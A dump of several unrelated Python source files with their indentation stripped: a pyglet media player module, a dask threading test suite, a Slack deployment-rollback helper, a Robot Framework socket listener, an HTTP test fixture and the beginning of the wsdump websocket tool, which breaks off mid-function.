self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
if _profile:
pyglet.clock.schedule(lambda dt: None)
else:
pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self.source.video_format:
self._texture = None
pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if _profile:
ts = 0
else:
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
pass
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The forward orientation should be orthagonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The up orientation should be orthagonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except:
if _debug:
print 'Error importing driver %s' % driver_name
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
|
MPSubscriber.py
|
from dppy.behavioral import pubsub
from multiprocessing import Process, SimpleQueue
class MPSubscriber(pubsub.AbsSubscriber):
def __init__(self, client, worker):
self._client = client
self._client.attach(self)
self.q = SimpleQueue()
Process(target=worker, args=(self.q,)).start()
def update(self, o):
self.q.put(o)
def __exit__(self, exc_type, exc_value, traceback):
self._client.detach(self)
|
automatic_rollbacks.py
|
import abc
import asyncio
import json
import logging
from multiprocessing import Process
from multiprocessing import Queue
from queue import Empty
from typing import Collection
from typing import Iterator
from typing import Mapping
from typing import TYPE_CHECKING
import requests
import transitions.extensions
from mypy_extensions import TypedDict
try:
from scribereader import scribereader
except ImportError:
scribereader = None
SLACK_WEBHOOK_STREAM = 'stream_slack_incoming_webhook'
SCRIBE_ENV = 'uswest1-prod'
log = logging.getLogger(__name__)
def get_slack_blocks_for_deployment(
message,
last_action=None,
status=None,
progress=None,
active_button=None,
available_buttons=["rollback", "forward"],
from_sha=None,
to_sha=None,
):
button_elements = get_button_elements(
available_buttons, active_button=active_button,
from_sha=from_sha, to_sha=to_sha,
)
blocks = [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": message,
},
},
{"type": "divider"},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": f"State machine: `{status}`\nProgress: {progress}\nLast operator action: {last_action}",
},
},
]
if button_elements != []:
blocks.append({
"type": "actions",
"block_id": "deployment_actions",
"elements": button_elements,
})
return blocks
def get_button_element(button, is_active, from_sha, to_sha):
active_button_texts = {
"rollback": f"Rolling Back to {from_sha[:8]} :zombocom:",
"forward": f"Rolling Forward to {to_sha[:8]} :zombocom:",
}
inactive_button_texts = {
"rollback": f"Roll Back to {from_sha[:8]} :arrow_backward:",
"forward": f"Continue Forward to {to_sha[:8]} :arrow_forward:",
}
if is_active is True:
confirm = False
text = active_button_texts[button]
else:
confirm = get_confirmation_object(button)
text = inactive_button_texts[button]
element = {
"type": "button",
"text": {
"type": "plain_text",
"text": text,
"emoji": True,
},
"confirm": confirm,
"value": button,
}
if not confirm:
del element["confirm"]
return element
def get_button_elements(buttons, active_button=None, from_sha=None, to_sha=None):
elements = []
for button in buttons:
is_active = button == active_button
elements.append(
get_button_element(button=button, is_active=is_active, from_sha=from_sha, to_sha=to_sha),
)
return elements
def get_confirmation_object(action):
return {
"title": {
"type": "plain_text",
"text": "Are you sure?",
},
"text": {
"type": "mrkdwn",
"text": f"Did you mean to press {action}?",
},
"confirm": {
"type": "plain_text",
"text": "Yes. Do it!",
},
"deny": {
"type": "plain_text",
"text": "Stop, I've changed my mind!",
},
}
class ButtonPress():
def __init__(self, event):
self.event = event
self.username = event["user"]["username"]
self.response_url = event["response_url"]
# TODO: Handle multiple actions?
self.action = event["actions"][0]["value"]
self.thread_ts = event["container"].get("thread_ts", None)
self.channel = event["channel"]["name"]
def __repr__(self):
return self.event
def update(self, blocks):
# Implements responding to button presses
# https://api.slack.com/messaging/interactivity/enabling#responding-to-interactions
# But isn't the api_call method per-se
# https://github.com/slackapi/python-slackclient/issues/270
requests.post(self.response_url, json={"blocks": blocks})
def event_to_buttonpress(event):
return ButtonPress(event=event)
def parse_webhook_event_json(line):
event = json.loads(line)
log.debug(event)
return event
def is_relevant_event(event):
# TODO: Implement filtering
return True
def get_slack_events():
if scribereader is None:
logging.error("Scribereader unavailable. Not tailing slack events.")
return
def scribe_tail(queue):
host_and_port = scribereader.get_env_scribe_host(SCRIBE_ENV, True)
host = host_and_port['host']
port = host_and_port['port']
tailer = scribereader.get_stream_tailer(SLACK_WEBHOOK_STREAM, host, port)
for line in tailer:
queue.put(line)
# Tailing scribe is not thread-safe, therefore we must use a Multiprocess-Queue-based
# approach, with paasta logs as prior art.
queue = Queue()
kw = {'queue': queue}
process = Process(target=scribe_tail, daemon=True, kwargs=kw)
process.start()
while True:
try:
line = queue.get(block=True, timeout=0.1)
event = parse_webhook_event_json(line)
if is_relevant_event(event):
yield event
except Empty:
pass
class TransitionDefinition(TypedDict):
trigger: str
source: str
dest: str
class DeploymentProcess(abc.ABC):
if TYPE_CHECKING:
# These attributes need to be defined in this `if TYPE_CHECKING` block, because if they exist at runtime then
# transitions will refuse to overwrite them.
state: str
def trigger(self, *args, **kwargs):
...
def __init__(
self,
):
self.event_loop = asyncio.get_event_loop()
self.finished_event = asyncio.Event(loop=self.event_loop)
self.machine = transitions.extensions.LockedMachine(
model=self,
states=list(self.states()),
transitions=list(self.valid_transitions()),
initial=self.start_state(),
after_state_change=self.after_state_change,
queued=True,
)
@abc.abstractmethod
def status_code_by_state(self) -> Mapping[str, int]:
raise NotImplementedError()
@abc.abstractmethod
def states(self) -> Collection['str']:
raise NotImplementedError()
@abc.abstractmethod
def valid_transitions(self) -> Iterator[TransitionDefinition]:
raise NotImplementedError()
@abc.abstractmethod
def start_transition(self):
raise NotImplementedError()
@abc.abstractmethod
def start_state(self):
raise NotImplementedError()
def finish(self):
self.finished_event.set()
def run(self):
return self.event_loop.run_until_complete(self.run_async())
async def run_async(self) -> int:
self.trigger(self.start_transition())
await self.finished_event.wait()
return self.status_code_by_state().get(self.state, 3)
def after_state_change(self):
if self.state in self.status_code_by_state():
self.event_loop.call_soon_threadsafe(self.finished_event.set)
|
http_server.py
|
import threading
from collections import defaultdict
from http import HTTPStatus
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
import pytest
class TestHandler(BaseHTTPRequestHandler):
handlers = defaultdict(dict)
@classmethod
def handler(cls, method, path):
def inner(func):
cls.handlers[method][path] = func
return func
return inner
def do_GET(self):
parse_result = urlparse(self.path)
func = self.handlers['GET'].get(parse_result.path)
if func is None:
return self.send_error(HTTPStatus.NOT_FOUND)
return func(self)
@TestHandler.handler('GET', '/headers')
def get_headers(handler):
handler.send_response(200)
for key, value in handler.headers.items():
handler.send_header(key, value)
handler.send_header('Content-Length', 0)
handler.end_headers()
@TestHandler.handler('GET', '/drip')
def chunked_drip(handler):
handler.send_response(200)
accept = handler.headers.get('Accept')
if accept is not None:
handler.send_header('Content-Type', accept)
handler.send_header('Transfer-Encoding', 'chunked')
handler.end_headers()
for _ in range(3):
body = 'test\n'
handler.wfile.write(f'{len(body):X}\r\n{body}\r\n'.encode('utf-8'))
handler.wfile.write('0\r\n\r\n'.encode('utf-8'))
@TestHandler.handler('GET', '/stream/encoding/random')
def random_encoding(handler):
from tests.fixtures import ASCII_FILE_CONTENT, FILE_CONTENT as UNICODE_FILE_CONTENT
handler.send_response(200)
handler.send_header('Transfer-Encoding', 'chunked')
handler.end_headers()
for body in [
ASCII_FILE_CONTENT,
ASCII_FILE_CONTENT,
UNICODE_FILE_CONTENT,
UNICODE_FILE_CONTENT,
UNICODE_FILE_CONTENT,
]:
body += "\n"
handler.wfile.write(f'{len(body.encode()):X}\r\n{body}\r\n'.encode())
handler.wfile.write('0\r\n\r\n'.encode('utf-8'))
@pytest.fixture(scope="function")
def http_server():
"""A custom HTTP server implementation for our tests, that is
built on top of the http.server module. Handy when we need to
deal with details which httpbin can not capture."""
server = HTTPServer(('localhost', 0), TestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
yield '{}:{}'.format(*server.socket.getsockname())
server.shutdown()
thread.join(timeout=0.5)
|
test_threaded.py
|
import os
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.system import CPU_COUNT
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {"x": 1, "y": 2, "z": (inc, "x"), "w": (add, "z", "y")}
assert get(dsk, "w") == 4
assert get(dsk, ["w", "z"]) == (4, 2)
def test_nested_get():
dsk = {"x": 1, "y": 2, "a": (add, "x", "y"), "b": (sum, ["x", "y"])}
assert get(dsk, ["a", "b"]) == (3, 3)
def test_get_without_computation():
dsk = {"x": 1}
assert get(dsk, "x") == 1
def test_broken_callback():
from dask.callbacks import Callback
def _f_ok(*args, **kwargs):
pass
def _f_broken(*args, **kwargs):
raise ValueError("my_exception")
dsk = {"x": 1}
with Callback(start=_f_broken, finish=_f_ok):
with Callback(start=_f_ok, finish=_f_ok):
with pytest.raises(ValueError, match="my_exception"):
get(dsk, "x")
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {"x": 1, "y": (bad, "x")}
pytest.raises(ValueError, lambda: get(dsk, "y"))
def test_reuse_pool():
with ThreadPool() as pool:
with dask.config.set(pool=pool):
assert get({"x": (inc, 1)}, "x") == 2
assert get({"x": (inc, 1)}, "x") == 2
def test_pool_kwarg():
def f():
sleep(0.01)
return threading.get_ident()
dsk = {("x", i): (f,) for i in range(30)}
dsk["x"] = (len, (set, [("x", i) for i in range(len(dsk))]))
with ThreadPool(3) as pool:
assert get(dsk, "x", pool=pool) == 3
def test_threaded_within_thread():
L = []
def f(i):
result = get({"x": (lambda: i,)}, "x", num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {("x", i): (lambda: i,) for i in range(10)}
dsk["x"] = (sum, list(dsk))
for i in range(20):
get(dsk, "x", num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_dont_spawn_too_many_threads_CPU_COUNT():
before = threading.active_count()
dsk = {("x", i): (lambda: i,) for i in range(10)}
dsk["x"] = (sum, list(dsk))
for i in range(20):
get(dsk, "x")
after = threading.active_count()
assert after <= before + CPU_COUNT * 2
def test_thread_safety():
def f(x):
return 1
dsk = {"x": (sleep, 0.05), "y": (f, "x")}
L = []
def test_f():
L.append(get(dsk, "y"))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.flaky(reruns=10, reruns_delay=5)
def test_interrupt():
# Windows implements `queue.get` using polling,
# which means we can set an exception to interrupt the call to `get`.
# Python 3 on other platforms requires sending SIGINT to the main thread.
if os.name == "nt":
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {("x", i): (long_task,) for i in range(20)}
dsk["x"] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, "x")
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
TestRunnerAgent.py
|
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Mikko Korpela under NSN copyrights
# Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''A Robot Framework listener that sends information to a socket
This uses the "pickle" module of python to send objects to the
listening server. It should probably be refactored to call an
XMLRPC server.
'''
import os
import socket
import threading
import SocketServer
try:
# RF 2.7.5
from robot.running import EXECUTION_CONTEXTS
def _is_logged(level):
current = EXECUTION_CONTEXTS.current
if current is None:
return True
out = current.output
if out is None:
return True
return out._xmllogger._log_message_is_logged(level)
except ImportError:
# RF 2.5.6
# RF 2.6.3
def _is_logged(level):
from robot.output import OUTPUT # Needs to be imported in the function as OUTPUT is not a constant
if OUTPUT is None:
return True
return OUTPUT._xmllogger._log_message_is_logged(level)
from robot.running.signalhandler import STOP_SIGNAL_MONITOR
from robot.errors import ExecutionFailed
try:
import cPickle as pickle
except ImportError:
import pickle
HOST = "localhost"
# Setting Output encoding to UTF-8 and ignoring the platform specs
# RIDE will expect UTF-8
import robot.utils.encoding
robot.utils.encoding.OUTPUT_ENCODING = 'UTF-8' # Set output encoding to UTF-8 for piped output streams
robot.utils.encoding._output_encoding = robot.utils.encoding.OUTPUT_ENCODING # RF 2.6.3 and RF 2.5.7
class TestRunnerAgent:
"""Pass all listener events to a remote listener
If called with one argument, that argument is a port
If called with two, the first is a hostname, the second is a port
"""
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, *args):
self.port = int(args[0])
self.host = HOST
self.sock = None
self._connect()
self._send_pid()
self._create_debugger(args[1] == 'True')
self._create_kill_server()
def _create_debugger(self, pause_on_failure):
self._debugger = RobotDebugger(pause_on_failure)
def _create_kill_server(self):
self._killer = RobotKillerServer(self._debugger)
self._server_thread = threading.Thread(target=self._killer.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
self._send_server_port(self._killer.server_address[1])
def _send_pid(self):
self._send_socket("pid", os.getpid())
def _send_server_port(self, port):
self._send_socket("port", port)
def start_test(self, name, attrs):
self._send_socket("start_test", name, attrs)
def end_test(self, name, attrs):
self._send_socket("end_test", name, attrs)
def start_suite(self, name, attrs):
self._send_socket("start_suite", name, attrs)
def end_suite(self, name, attrs):
self._send_socket("end_suite", name, attrs)
def start_keyword(self, name, attrs):
self._send_socket("start_keyword", name, attrs)
if self._debugger.is_breakpoint(name, attrs):
self._debugger.pause()
paused = self._debugger.is_paused()
if paused:
self._send_socket('paused')
self._debugger.start_keyword()
if paused:
self._send_socket('continue')
def end_keyword(self, name, attrs):
self._send_socket("end_keyword", name, attrs)
self._debugger.end_keyword(attrs['status']=='PASS')
def message(self, message):
pass
def log_message(self, message):
if _is_logged(message['level']):
self._send_socket("log_message", message)
def log_file(self, path):
self._send_socket("log_file", path)
def output_file(self, path):
pass
def report_file(self, path):
self._send_socket("report_file", path)
def summary_file(self, path):
pass
def debug_file(self, path):
pass
def close(self):
self._send_socket("close")
if self.sock:
self.filehandler.close()
self.sock.close()
def _connect(self):
'''Establish a connection for sending pickles'''
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
# Iron python does not return right kind of objects if binary mode is not used
self.filehandler = self.sock.makefile('wb')
self.pickler = pickle.Pickler(self.filehandler)
except socket.error, e:
print 'unable to open socket to "%s:%s" error: %s' % (self.host, self.port, str(e))
self.sock = None
def _send_socket(self, name, *args):
if self.sock:
packet = (name, args)
self.pickler.dump(packet)
self.filehandler.flush()
class RobotDebugger(object):
def __init__(self, pause_on_failure=False):
self._state = 'running'
self._keyword_level = 0
self._pause_when_on_level = -1
self._pause_on_failure = pause_on_failure
self._resume = threading.Event()
def is_breakpoint(self, name, attrs):
return name == 'BuiltIn.Comment' and attrs['args'] == ['PAUSE']
def pause(self):
self._resume.clear()
self._state = 'pause'
def pause_on_failure(self, pause):
self._pause_on_failure = pause
def resume(self):
self._state = 'running'
self._pause_when_on_level = -1
self._resume.set()
def step_next(self):
self._state = 'step_next'
self._resume.set()
def step_over(self):
self._state = 'step_over'
self._resume.set()
def start_keyword(self):
while self._state == 'pause':
self._resume.wait()
self._resume.clear()
if self._state == 'step_next':
self._state = 'pause'
elif self._state == 'step_over':
self._pause_when_on_level = self._keyword_level
self._state = 'resume'
self._keyword_level += 1
def end_keyword(self, passed=True):
self._keyword_level -= 1
if self._keyword_level == self._pause_when_on_level \
or (self._pause_on_failure and not passed):
self._state = 'pause'
def is_paused(self):
return self._state == 'pause'
class RobotKillerServer(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, debugger):
SocketServer.TCPServer.__init__(self, ("",0), RobotKillerHandler)
self.debugger = debugger
class RobotKillerHandler(SocketServer.StreamRequestHandler):
def handle(self):
data = self.request.makefile('r').read().strip()
if data == 'kill':
self._signal_kill()
elif data == 'pause':
self.server.debugger.pause()
elif data == 'resume':
self.server.debugger.resume()
elif data == 'step_next':
self.server.debugger.step_next()
elif data == 'step_over':
self.server.debugger.step_over()
elif data == 'pause_on_failure':
self.server.debugger.pause_on_failure(True)
elif data == 'do_not_pause_on_failure':
self.server.debugger.pause_on_failure(False)
def _signal_kill(self):
try:
STOP_SIGNAL_MONITOR(1,'')
except ExecutionFailed:
pass
|
wsdump.py
|
#!/Users/gpm/Documents/Projects/dataisbeautiful-bot/venv/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
